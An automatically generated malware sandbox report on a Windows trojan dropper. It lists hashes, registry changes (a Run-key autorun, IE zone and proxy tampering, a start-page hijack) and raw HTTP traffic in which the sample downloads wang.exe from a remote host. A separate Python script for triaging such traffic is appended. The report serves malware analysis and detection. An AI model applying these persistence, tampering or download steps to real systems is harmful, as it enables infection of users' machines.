Trojan-Dropper.Win32.Sysn.azxe (Kaspersky), Gen:Variant.Zusy.110367 (B) (Emsisoft), Gen:Variant.Zusy.110367 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 56ddb80a1ebb19055c510bfca1f92294
SHA1: 4372065e8372954bf97fc670fa6e36a190a5f705
SHA256: 1adca530705c1432066dde89570f22492124642524e73c60221d29db6d88198f
SSDeep: 49152:SEAlc zI4R961HNq 89ZYhqtg2hB9VXfBwvBoVinSofdD4oUZCVinSofdD4oUZU:0d zf3Wy62AnSoFDRAnSoFD6AnSoFDf
Size: 4952064 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftWindowsShortcutfile, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-03 06:47:24
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
setup.exe:1836
taskkill.exe:916
%original file name%.exe:1616
regedit.exe:572
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2E221QAM\OEM[1].htm (17 bytes)
C:\oem (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\A781Y74F\conv[1].txt (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@100public[1].txt (219 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@doudousoft[1].txt (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setup.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Desktop\ÃÂÂøÖ·µ¼º½.lnk (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX45Y581\wang[1].htm (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doudousoft[1].txt (207 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX45Y581\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2E221QAM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\URYRI5ET\config[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\URYRI5ET\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\A781Y74F\desktop.ini (67 bytes)
Registry activity
The process setup.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Internet Explorer\International]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 10 87 E3 B3 D8 26 ED 59 6F AF A1 13 E1 76 36"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 A1 75 48 17 B1 AA 0F FE E5 61 2D D8 09 6C 18"
The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 75 98 74 C6 C9 2D CE 12 D9 C0 1B F5 D5 05 D6"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?26263"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Play_Background_Sounds" = "yes"
The Trojan modifies IE security zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"smss" = "c:\smss.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regedit.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 3D C8 0A 22 96 27 A2 EE 9E 2C 63 5B DC 0E 79"
Dropped PE files
MD5 | File path |
---|---|
e4e325e3dbcb186124574f00f8676688 | c:\setup.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Static Analysis
VersionInfo
Company Name: ????
Product Name: ????
Product Version: 1.0.0.0
Legal Copyright: ???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ????
Comments: ????
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 758451 | 761856 | 4.4944 | a9933e2590e237584ef6cd1dbf82471f |
.rdata | 765952 | 3985990 | 3989504 | 4.99757 | e7026a65a6b3e3cd3c8b090ed127f82f |
.data | 4755456 | 283752 | 73728 | 3.79412 | 9bd8d7bcc528174b74da5eaf9e1079bd |
.rsrc | 5042176 | 122304 | 122880 | 2.88752 | c96d774d59c0ca7f998209e0aeb9ade6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://56.doudousoft.com/ini/liuliang/wang.html | 222.191.251.197 |
hxxp://56.doudousoft.com/updata/305344326303316304274376/wang.exe | 222.191.251.197 |
hxxp://validate.100public.com.cname.yunjiasu-cdn.net/conv.txt?.6889612123456789 | 162.159.208.103 |
hxxp://validate.100public.com.cname.yunjiasu-cdn.net/API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 | 162.159.208.103 |
hxxp://validate.100public.com/API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 | 162.159.208.103 |
hxxp://56.doudousoft.com/updata/......../wang.exe | 222.191.251.197 |
hxxp://56.doudousoft.com/ini/liuliang/config.html | 222.191.251.197 |
hxxp://validate.100public.com/conv.txt?.6889612123456789 | 162.159.208.103 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1545828-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:55 GMT
Content-Length: 1030556
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1545828-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1803466-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 772918
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1803466-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jul 2015 08:08:42 GMT
Content-Length: 2576384
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=2061104-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:09:03 GMT
Content-Length: 515280
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 2061104-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=257638-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 2318746
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 257638-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /conv.txt?.6889612123456789 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: validate.100public.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:54 GMT
Content-Type: text/plain
Content-Length: 1521
Connection: keep-alive
Set-Cookie: __cfduid=d95da6de3325bdf9955353bba832f874e1437638933; expires=Fri, 22-Jul-16 08:08:53 GMT; path=/; domain=.100public.com; HttpOnly
Content-Encoding: gzip
Last-Modified: Mon, 23 Mar 2015 05:11:02 GMT
Accept-Ranges: bytes
ETag: "4019fc22765d01:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
ServerTag: G2S3
Server: yunjiasu-nginx
CF-RAY: 20a5e6680c5e0f45-FRA
GET /API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: validate.100public.com
Connection: Keep-Alive
Cookie: __cfduid=d95da6de3325bdf9955353bba832f874e1437638933
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
X-Powered-By: ASP.NET
ServerTag: G2S3
Server: yunjiasu-nginx
CF-RAY: 20a5e66c8ce20f45-FRA
Content-Encoding: gzip
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=772914-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:50 GMT
Content-Length: 1803470
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 772914-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1030552-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 1545832
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1030552-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
(binary response body, bytes 1030552-2576383 of wang.exe, not reproduced)
<<< skipped >>>
GET /ini/liuliang/wang.html HTTP/1.1
Referer: hXXp://56.doudousoft.com/ini/liuliang/wang.html
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 56.doudousoft.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:17 GMT
Content-Length: 1394
Content-Type: text/html
Content-Location: hXXp://56.doudousoft.com/ini/liuliang/wang.html
Last-Modified: Mon, 09 Feb 2015 08:25:13 GMT
Accept-Ranges: bytes
ETag: "2ac01bed4144d01:509e"
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=04BB3AA94037E5C323362778CE366DBD; expires=Thur, 23-Jul-2015 16:00:17 GMT; domain=doudousoft.com; path=/
(response body of wang.html, one directive per line; bytes the report could not print, including the non-ASCII tag names and the CRLF after each <br>, are shown as dots)
[........]XXXX[/........]<br>
[............]..[/............]<br>
[........]5000[/........]<br>
[............]..[/............]<br>
[........]hXXp://56.doudousoft.com/updata/......../wang.exe[/........]<br>
[............]wang.exe[/............]<br>
[......]..........BUG..[/......]<br>
[..........].........html[/..........]<br>
[............]..[/............]<br>
[........]hXXp://VVV.shendusoft.com[/........]<br>
[..............]..[/..............]<br>
[..........]hXXp://56.doudousoft.com/guanggao.html[/..........]<br>
[..................]..[/..................]<br>
[..............]hXXp://u.126it.com[/..............]<br>
[................]..[/................]<br>
[............]hXXp://VVV.2345.com/?26263[/............]<br>
[....................]..[/....................]<br>
[................]hXXp://VVV.2345.com/?26263[/................]<br>
[................]2345.........lnk[/................]<br>
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " hXXps://" : " hXXp://");document.write(unescape("
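The traffic above is a two-stage fetch: the sample requests a config page (wang.html) with one User-Agent, and a downloader then pulls wang.exe in resumed byte-range pieces (Range: bytes=772914-, then bytes=1030552-) with a different User-Agent, the server answering 206 with a Content-Range whose total stays 2576384. The script below is an added example, not part of the Lavasoft report: it parses a transcript laid out like this one and reports, per downloaded resource, which byte intervals the captured pieces leave unaccounted for, which hosts were contacted with more than one User-Agent, and which URLs the fetched config carries. SAMPLE is a constructed abridgement of the captured exchanges (binary bodies dropped, the config cut to three directives); the names Message, parse_transcript, coverage_gaps and analyze are mine, and the parser assumes a message's body starts at the first line that is not a header and that a "<<< skipped >>>" marker ends whatever message precedes it.

```python
"""Triage indicators from a sandbox HTTP transcript: Range-download coverage, hosts hit
with more than one User-Agent, and the URLs a fetched config hands to the downloader.
Added example; SAMPLE is a constructed abridgement of the captured traffic."""
import re
from dataclasses import dataclass, field

REQ_RE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\s*$")
RESP_RE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
CRANGE_RE = re.compile(r"^bytes (\d+)-(\d+)/(\d+)$")
URL_RE = re.compile(r"hXXps?://[^\s<>\[\]\"']+")   # defanged URLs, as the report prints them
SAMPLE = """\
GET /ini/liuliang/wang.html HTTP/1.1
Host: 56.doudousoft.com
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA)
HTTP/1.1 200 OK
Content-Type: text/html
[........]5000[/........]<br>
[........]hXXp://56.doudousoft.com/updata/......../wang.exe[/........]<br>
[..........]hXXp://56.doudousoft.com/guanggao.html[/..........]<br>
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=772914-
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Range: bytes 772914-2576383/2576384
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1030552-
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Range: bytes 1030552-2576383/2576384
"""

@dataclass
class Message:
    kind: str      # "request" or "response"
    start: str     # request target, or status code
    headers: dict = field(default_factory=dict)
    body: list = field(default_factory=list)

def parse_transcript(text):
    """Split the transcript into messages; header names are lower-cased."""
    msgs, cur, in_body = [], None, False
    for line in text.splitlines():
        if m := REQ_RE.match(line):
            cur, in_body = Message("request", m.group(2)), False
            msgs.append(cur)
        elif m := RESP_RE.match(line):
            cur, in_body = Message("response", m.group(1)), False
            msgs.append(cur)
        elif cur is None or line.strip() == "<<< skipped >>>":
            cur = None                 # elided region: attribute nothing to it
        elif not in_body and (h := HDR_RE.match(line)):
            cur.headers[h.group(1).lower()] = h.group(2).strip()
        else:
            in_body = True             # first non-header (or blank) line opens the body
            cur.body.append(line)
    return msgs

def coverage_gaps(ranges, total):
    """Intervals of [0, total) that no (first, last) range covers; overlapping resumed pieces are fine."""
    gaps, pos = [], 0
    for first, last in sorted(ranges):
        if first > pos:
            gaps.append((pos, first - 1))
        pos = max(pos, last + 1)
    if pos < total:
        gaps.append((pos, total - 1))
    return gaps

def analyze(text):
    """Config URLs, per-resource Range-download summaries, and hosts hit with more than one UA."""
    downloads, agents, urls, pending = {}, {}, [], None
    for m in parse_transcript(text):
        if m.kind == "request":
            pending = m
            continue
        if pending is None:            # response without a request in the transcript
            continue
        req, resp, pending = pending, m, None
        host = req.headers.get("host", "")
        agents.setdefault(host, set()).add(req.headers.get("user-agent", ""))
        ctype = resp.headers.get("content-type", "")
        if resp.start == "200" and ctype.startswith("text/"):
            urls += URL_RE.findall("\n".join(resp.body))   # what the config hands the downloader
        cr = CRANGE_RE.match(resp.headers.get("content-range", ""))
        if resp.start == "206" and cr and ctype == "application/octet-stream":
            first, last, total = map(int, cr.groups())
            d = downloads.setdefault(host + req.start, {"total": total, "ranges": []})
            d["ranges"].append((first, last))
    for d in downloads.values():
        d["gaps"] = coverage_gaps(d["ranges"], d["total"])
    return {"config_urls": urls, "downloads": downloads,
            "mixed_agents": {h: sorted(a) for h, a in agents.items() if len(a) > 1}}
```

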